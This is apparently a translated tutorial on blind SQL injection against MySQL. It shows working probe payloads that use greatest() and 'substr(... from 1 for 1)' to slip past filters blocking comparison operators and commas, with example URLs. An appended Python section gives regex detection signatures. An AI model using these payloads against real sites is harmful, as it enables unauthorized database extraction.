Tips: when the injection point does not support UNION, error-based extraction, multi-statement execution, running system commands, HTTP requests, or any of the other more convenient techniques, you may have to fall back on blind guessing. While guessing you may run into restrictions; all the attacker has to do is break through them.

1. Using greatest() to bypass the comparison operators

Binary search is typically used to guess a single character, and that cannot be done without a less-than or greater-than comparison.

    mysql> select ascii(mid(user(),1,1)) < 150;
    +------------------------------+
    | ascii(mid(user(),1,1)) < 150 |
    +------------------------------+
    |                            1 |
    +------------------------------+

This tests whether the ASCII code of the first character of user() is less than 150. It returns true (1) if it is, otherwise false (0). As you can see, the comparison operator is needed. For a boolean-based injection, for example, try:

    http://xxx.com/index.php?id=1 and ascii(mid(user(),1,1)) < 150
    http://xxx.com/index.php?id=1 and ascii(mid(user(),1,1)) >= 150

The two pages should return different content. The problem is that in some cases the comparison operators (<, >) are filtered and cannot be used. In that case greatest() can be used to bypass the filter: greatest(a, b) returns the larger of a and b.

Usage: when we want to guess whether the ASCII code of the first character of user() is less than or equal to 150, use

    mysql> select greatest(ascii(mid(user(),1,1)),150)=150;
    +------------------------------------------+
    | greatest(ascii(mid(user(),1,1)),150)=150 |
    +------------------------------------------+
    |                                        1 |
    +------------------------------------------+

If it is less than or equal to 150, the expression above returns true.

2. Using substr() to bypass commas

Cases where commas cannot be used are rarer; usually it is because the comma has some special role in the application and is handled separately. Guessing normally needs a comma, because the mid() function takes its position and length arguments separated by commas:

    ascii(mid(user(),1,1))=150

The bypass is the "from X for Y" syntax:

    mid(user() from 1 for 1)
    substr(user() from 1 for 1)

Both of these also take one character starting from the first character. So the comma-free injection syntax becomes:

    mysql> select ascii(substr(user() from 1 for 1)) < 150;
    +------------------------------------------+
    | ascii(substr(user() from 1 for 1)) < 150 |
    +------------------------------------------+
    |                                        1 |
    +------------------------------------------+

This gives the same result as the mid() form, without using a comma.
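Added example, not from the original post: a small Python check, using constructed request values built from the post's own queries, that shows why a WAF rule keyed only on the punctuation (<, > or commas) misses these probes, and how a detection keyed on the functions the probes depend on (ascii(), greatest()/least(), and the comma-free "substr(x from N for M)" form) flags all three. The rule names and sample values are assumptions made for this example.

```python
import re

# Naive WAF rules of the kind the post defeats (constructed for this example):
# one blocks on comparison operators, the other blocks on commas.
COMPARISON_OPERATORS = re.compile(r"[<>]")
COMMA = re.compile(r",")

# Detection keyed on the building blocks of the blind probe instead of the
# punctuation: character extraction wrapped in ascii(), comparison smuggled
# through greatest()/least(), and the comma-free "from N for M" substring form.
# Case-insensitive and tolerant of the spacing seen in the post's examples.
BLIND_PROBE_SIGNATURES = [
    re.compile(r"\bascii\s*\(", re.I),
    re.compile(r"\b(greatest|least)\s*\(", re.I),
    re.compile(r"\b(mid|substr|substring)\s*\(.*?\bfrom\b.*?\bfor\b", re.I),
]


def blocks_comparison(value: str) -> bool:
    """True if the naive '<'/'>' rule would block this value."""
    return bool(COMPARISON_OPERATORS.search(value))


def blocks_comma(value: str) -> bool:
    """True if the naive comma rule would block this value."""
    return bool(COMMA.search(value))


def blind_probe_detected(value: str) -> bool:
    """True if any function-level signature matches (the defender's rule)."""
    return any(sig.search(value) for sig in BLIND_PROBE_SIGNATURES)


# Constructed sample values for the 'id' parameter, taken from the post's queries.
SAMPLE_VALUES = {
    "plain_comparison": "1 and ascii(mid(user(),1,1)) < 150",
    "greatest_bypass": "1 and greatest(ascii(mid(user(),1,1)),150)=150",
    "comma_free": "1 and ascii(substr(user() from 1 for 1)) < 150",
    "benign": "1",
}


def evaluate(values=SAMPLE_VALUES):
    """Map each sample to what the naive rules and the signature rule decide."""
    return {
        name: {
            "blocks_comparison": blocks_comparison(v),
            "blocks_comma": blocks_comma(v),
            "signature": blind_probe_detected(v),
        }
        for name, v in values.items()
    }
```

Regex signatures like these are a detection aid for logs or a WAF; the fix that removes the whole class of probe is parameterized queries on the application side.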
SQL Injection Bypass WAF